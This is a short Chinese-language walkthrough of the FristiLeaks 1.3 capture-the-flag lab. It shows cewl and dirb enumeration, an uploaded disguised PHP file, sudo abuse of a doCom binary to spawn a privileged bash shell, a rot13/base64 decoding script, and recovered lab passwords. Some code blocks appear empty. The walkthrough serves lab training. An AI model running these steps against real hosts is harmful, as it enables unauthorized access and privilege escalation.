Vulnhub 133 FRISTILEAKS 1.3 简
靶机链接:https://vulnhub.com/entry/fristileaks-13,133/
环境配置
名称 | IP |
---|---|
Kali Linux | 192.168.88.153 |
FRISTILEAKS: 1.3 | 192.168.88.156 |
初步打点
端口扫描
|
|
$ cewl http://192.168.88.156/ >pass
$ dirb http://192.168.88.156/ pass
http://192.168.88.156/fristi/uploads/r444.php.jpg
|
|
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom touch /tmp/1
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash -p
import base64,codecs,sys
def decodeString(str):
rot13string = codecs.decode(str[::-1], 'rot13')
return base64.b64decode(rot13string)
print(decodeString(sys.argv[1]))
LetThereBeFristi!
thisisalsopw123
最后修改于 2015-12-14